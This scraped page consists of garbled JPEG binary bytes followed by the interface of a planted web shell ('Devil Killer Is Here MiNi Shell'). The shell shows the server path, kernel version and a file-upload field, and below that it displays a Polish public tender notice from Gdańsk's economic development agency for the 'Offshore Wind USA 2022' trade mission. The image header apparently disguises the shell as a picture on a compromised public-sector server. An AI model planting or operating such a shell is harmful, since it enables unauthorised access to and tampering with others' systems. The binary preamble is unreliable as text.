JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220302/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220302/0007310201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Organizacja i logistyka spotkań biznesowych pomorskich przedsiębiorców sektora MŚP w<br/>ramach misji gospodarczej „Offshore Wind USA 2022” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gdańska Agencja Rozwoju Gospodarczego Sp. z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 220714278</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żaglowa 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-560</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(58) 722 03 00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">office@investgda.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.investgda.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Podmiot zobowiązany do udzielania zamówień publicznych w ramach projektu &#34;Pomorski Broker Eksportowy&#34; na podstawie umowy o dofinansowanie z dnia 07.07.2016r. </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Działalność na rzecz Gminy Miasta Gdańska w tym gospodarowanie nieruchomościami </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Organizacja i logistyka spotkań biznesowych pomorskich przedsiębiorców sektora MŚP w<br/>ramach misji gospodarczej „Offshore Wind USA 2022” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7bd4c361-9a13-11ec-80f8-1ad70aec7fa4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00073102</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Pomorski Broker Eksportowy. Kompleksowy system wspierania eksportu w województwie pomorskim” realizowany w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2014-2020, Osi Priorytetowej 2 Przedsiębiorstwa, Działanie 2.3. Aktywność eksportowa, współfinansowany ze środków Unii Europejskiej (Europejskiego Funduszu Rozwoju Regionalnego). </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://investgda.ezamowienia.com/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym<br/>a Wykonawcami odbywa się przy użyciu Platformy Zamówień Publicznych ZETOPZP dostępnej pod<br/>adresem: https://investgda.ezamowienia.com/ (dalej: „Platforma”) oraz poczty elektronicznej:<br/>a.maderska@investgda.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z art. 67 ustawy PZP określa następujące wymagania techniczne<br/>i organizacyjne sporządzania, wysyłania i odbierania korespondencji elektronicznej przy wykorzystaniu<br/>Platformy:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>b) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV<br/>2GHZ, jeden z systemów operacyjnych - MS Windows 10 , Mac Os x 10.4, Linux, lub ich nowsze<br/>wersje;<br/>c) zainstalowana dowolna przeglądarka internetowa najlepiej najnowszej dostępnej wersji obsługująca<br/>TLS 1.2 z wyjątkiem Internet Explorer;<br/>d) włączona obsługa JavaScript;<br/>e) zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.;<br/>f) podłączony lub wbudowany do komputera czytnik karty kryptograficznej wydanej przez wystawcę<br/>certyfikatu używanego przez Wykonawcę.<br/>Zamawiający, zgodnie z §11 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r.<br/>w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452) podaje następujące informacje na<br/>temat specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu<br/>przekazania i odbioru danych:<br/>a) dopuszczalne formaty przesyłanych danych, tj. plików o wielkości do 100 MB<br/>w formatach: .doc, .pdf, .zip, .docx, .xls, .xlsx, .rar, .7zip, .jpg, .jpeg, .png, .txt, .tiff, .xades, .sig,<br/>b) plik załączony przez Wykonawcę na Platformie i zapisany, widoczny jest jako zaszyfrowany – format<br/>kodowania UTF8; możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez<br/>Zamawiającego po upływie terminu składania ofert,<br/>c) oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss)<br/>generowany wg czasu platformy Microsoft Azure, który jest synchronizowany ze znacznikiem czasu<br/>UTC.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">KLAUZULA INFORMACYJNA RODO<br/>Zgodnie z art. 13 ust. 1 i ust. 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679<br/>z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE<br/>(ogólnego rozporządzenia o ochronie danych osobowych) informuję, iż:<br/>1) Administratorem Pani/Pana danych osobowych jest Gdańska Agencja Rozwoju Gospodarczego Sp.<br/>z o. o. z siedzibą w Gdańsku przy ul. Żaglowej 11, tel.: (58) 722 03 00, office@investgda.pl;<br/>2) Pani/Pana dane osobowe przetwarzane będą:<br/>a) w celu wykonania umowy, której będzie Pani/Pan stroną – w przypadku jej zawarcia lub<br/>w celu podjęcia działań na Pani/Pana żądanie – przed zawarciem umowy, na podstawie art. 6 ust 1 lit.<br/>b) ogólnego rozporządzenia o ochronie danych osobowych oraz<br/>b) w celu związanym z przeprowadzeniem niniejszego postępowania w trybie podstawowym bez<br/>negocjacji, co stanowi uzasadniony interes administratora, na podstawie art. 6 ust. 1 lit f) ogólnego<br/>rozporządzenia o ochronie danych osobowych;<br/>3) Podane przez Panią/Pana dane osobowe nie będą udostępniane innym odbiorcom, chyba że będzie<br/>to wymogiem wynikającym z przepisów obowiązującego prawa (np. organom administracji publicznej);<br/>4) Podane przez Panią/Pana dane osobowe nie będą przekazywane do państwa trzeciego;<br/>5) Pani/Pana dane osobowe będą przechowywane przez okres niezbędny do realizacji obowiązków, o<br/>których mowa w pkt 2) powyżej, a po tym czasie przez okres oraz w zakresie wymaganym przez<br/>przepisy powszechnie obowiązującego prawa oraz postanowienia „Wytycznych w zakresie zasad<br/>przechowywania i udostępniania dokumentów związanych z realizacją projektów dofinansowanych w<br/>ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2014-2020”; w tym<br/>– w przypadku gdy dotyczy – podane dane będą przechowywane przez okres realizacji zawartej<br/>umowy oraz dochodzenia ewentualnych roszczeń; dane zawarte w wystawionych dokumentach<br/>księgowych przechowywane będą przez Administratora przez okres przechowywania odpowiedniej<br/>dokumentacji księgowej na cele podatkowe;<br/>6) Posiada Pani/Pan prawo dostępu do treści swoich danych oraz prawo ich sprostowania,<br/>Ogłoszenie nr 2022/BZP 00056707/01 z dnia 2022-02-14<br/>2022-02-14 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>ograniczenia przetwarzania, prawo wniesienia sprzeciwu;<br/>7) Posiada Pani/Pan prawo wniesienia skargi do organu nadzorczego, jakim jest Prezes Urzędu<br/>Ochrony Danych Osobowych, gdy uzna Pani/Pan, iż przetwarzanie danych osobowych narusza<br/>przepisy ogólnego rozporządzenia o ochronie danych osobowych;<br/>8) Podanie przez Panią/Pana danych osobowych jest dobrowolne, jednak ich podanie warunkuje<br/>możliwość podjęcia działań przed zawarciem umowy jak i zawarcie samej umowy oraz wzięcie udziału<br/>w Postępowaniu;<br/>9) Pani/Pana dane nie będą wykorzystywane do zautomatyzowanego podejmowania decyzji, w tym<br/>również w formie profilowania.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1. Skorzystanie przez osobę, której dane osobowe dotyczą,<br/>z uprawnienia do sprostowania lub uzupełniania, o którym mowa w art. 16 Rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 roku w sprawie ochrony osób fizycznych<br/>w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych<br/>oraz uchylenia dyrektywy 95/46/WE (ogólnie rozporządzenie o ochronie danych) (Dz. Urz.UE L 119 z<br/>04.05.2016, str. 1, z późn. zm.) zwanego dalej &#34;Rozporządzeniem 2016/679&#34;, nie może skutkować<br/>zmianą wyniku postepowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie<br/>zamówienia publicznego w zakresie niezgodnym z ustawą Prawo Zamówień Publicznych.<br/>2. W postepowaniu o udzielnie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym<br/>mowa w art.18 ust.1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem Zamówienia jest świadczenie usługi organizacji i logistyki spotkań biznesowych<br/>pomorskich przedsiębiorców sektora mikro/małych/średnich przedsiębiorstw (dalej: MŚP)<br/>w ramach misji gospodarczej „Offshore Wind USA 2022” polegające na zapewnieniu:<br/>1) transportu lotniczego wraz z dodatkowym bagażem rejestrowanym<br/>2) transportu lotniczego rollup-a<br/>3) noclegów wraz ze śniadaniem<br/>4) ubezpieczenia<br/>5) transportu lokalnego<br/>6) wyżywienia poza hotelem w tym: lunchy i kolacji biznesowej zgodnie ze Szczegółowym<br/>Opisem Przedmiotu Zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">63500000-4 - Usługi biur podróży, podmiotów turystycznych i pomocy turystycznej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">63515000-2 - Usługi podróżne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-05-07</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona wyboru oferty najkorzystniejszej z<br/>uwzględnieniem następującego kryterium, gdzie 1% jest równy 1 punktowi:<br/>Cena brutto – waga 100%<br/>Punkty będą przyznawane wg wzoru: iloraz ceny najniższej przez cenę badaną razy waga<br/>procentowa.<br/>Sposób obliczenia:<br/>KC= (CN / CR) x 100<br/>gdzie:<br/>KC – liczba punktów dla kryterium „Cena”<br/>CN – najniższa oferowana cena<br/>CR – cena oferty rozpatrywanej<br/>2. Oferta, która uzyska największą ilość punktów zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia może się ubiegać podmiot, który spełnia warunki udziału<br/>w postępowaniu w zakresie:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunków w tym zakresie,<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Wpis do Centralnej Ewidencji Organizatorów Turystyki i Przedsiębiorców Ułatwiających<br/>Nabywanie Powiązanych Usług Turystycznych prowadzonej przez Marszałka Województwa, lub<br/>– w przypadku Wykonawców mających siedzibę lub miejsce zamieszkania poza granicami<br/>Rzeczypospolitej Polskiej – rejestru prowadzonego przez właściwe władze danego kraju<br/>pochodzenia Wykonawcy, o ile prawo kraju pochodzenia Wykonawcy wymaga takiego wpisu,<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunków w tym zakresie,<br/>4) zdolności technicznej lub zawodowej:<br/>Zamawiający uzna, że Wykonawca spełnił ten warunek, jeśli Wykonawca wykonał w okresie<br/>ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności<br/>jest krótszy to w tym okresie, co najmniej 2 usługi organizacji wyjazdów zagranicznych o<br/>wartości każdego zamówienia na poziomie minimum 120.000,00 zł brutto, dla co najmniej 10<br/>osób każdy wyjazd.<br/>W przypadku, gdy powyższa wartość wyrażona będzie w walucie obcej, należy przeliczyć tę<br/>wartość w oparciu o średni kurs walut Narodowego Banku Polskiego (dalej: NBP) dla danej<br/>waluty z dnia, w którym nastąpi publikacja ogłoszenia o przedmiotowym postępowaniu. Jeżeli w<br/>tym dniu nie będzie opublikowany średni kurs NBP, należy przyjąć średni kurs<br/>z ostatniego dnia przed dniem publikacji. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Zamawiający w celu wstępnego potwierdzenia, że Wykonawca nie podlega wykluczeniu oraz<br/>spełnia warunki udziału w postępowaniu żąda złożenia wraz z ofertą oświadczenia<br/>o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu, o którym mowa w art.<br/>125 ust. 1 ustawy PZP zgodnie z rozdziałem X SWZ.<br/>2. Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych<br/>służących potwierdzeniu braku podstaw wykluczenia i spełniania warunków udziału w postępowaniu,<br/>aktualnych na dzień złożenia podmiotowych środków dowodowych, w formie dokumentów wskazanych<br/>szczegółowo w ust. 4 - 6 rozdziału X SWZ.<br/>3. W celu potwierdzenia braku podstaw wykluczenia Wykonawcy Zamawiający żąda oświadczenia<br/>Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1<br/>ustawy PZP w zakresie podstaw wykluczenia z postępowania wskazanych w rozdziale IX ust. 1 i 2<br/>SWZ, zgodnie ze wzorem stanowiącym załącznik nr 4 do SWZ. W przypadku wspólnego ubiegania się<br/>o zamówienie przez Wykonawców, oświadczenie, o którym mowa w zdaniu uprzednim, składa każdy z<br/>Wykonawców.<br/>4. Zamawiający żąda od Wykonawcy, który polega na zdolnościach technicznych lub zawodowych<br/>podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy PZP, przedstawienia<br/>oświadczenia tych podmiotów o aktualności informacji zawartych w oświadczeniu, o którym mowa w<br/>art. 125 ust. 5 ustawy PZP, w zakresie podstaw wykluczenia<br/>z postępowania wskazanych w rozdziale IX ust. 1 i 2 SWZ, zgodnie ze wzorem stanowiącym załącznik<br/>nr 4 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Zamawiający w celu wstępnego potwierdzenia, że Wykonawca nie<br/>podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu żąda złożenia wraz z ofertą<br/>oświadczenia<br/>o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu, o którym mowa w art.<br/>125 ust. 1 ustawy PZP zgodnie z rozdziałem X SWZ.<br/>2. Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych<br/>służących potwierdzeniu braku podstaw wykluczenia i spełniania warunków udziału w postępowaniu,<br/>aktualnych na dzień złożenia podmiotowych środków dowodowych, w formie dokumentów wskazanych<br/>szczegółowo w ust. 4 - 6 rozdziału X SWZ.<br/>3. W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących<br/>zdolności technicznej lub zawodowej, Zamawiający żąda:<br/>wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również<br/>wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym<br/>okresie, wraz z podaniem ich wartości, przedmiotu (w tym ilości osób, dla których organizowany był<br/>każdy z wyjazdów), dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są<br/>wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są<br/>wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń<br/>powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od<br/>niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń<br/>powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające<br/>ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy, zgodnie ze wzorem<br/>stanowiącym Załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oferta winna być sporządzona zgodnie z wymogami SWZ na Formularzu Oferty, stanowiącym<br/>Załącznik nr 2 do SWZ.<br/>2. Oferta musi być sporządzona w języku polskim, w formacie danych określonych w przepisach,<br/>wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności<br/>podmiotów realizujących zadania publiczne (Dz. U. z 2021 r. poz. 2070 t.j.)<br/>i opatrzona kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym przez osobę upoważnioną do reprezentowania Wykonawcy, zgodnie z formą<br/>reprezentacji Wykonawcy określoną w rejestrze lub innym dokumencie, właściwym dla danej<br/>formy organizacyjnej Wykonawcy albo przez upełnomocnionego przedstawiciela Wykonawcy.<br/>Wybór formatu musi umożliwiać użycie jednego z ww. 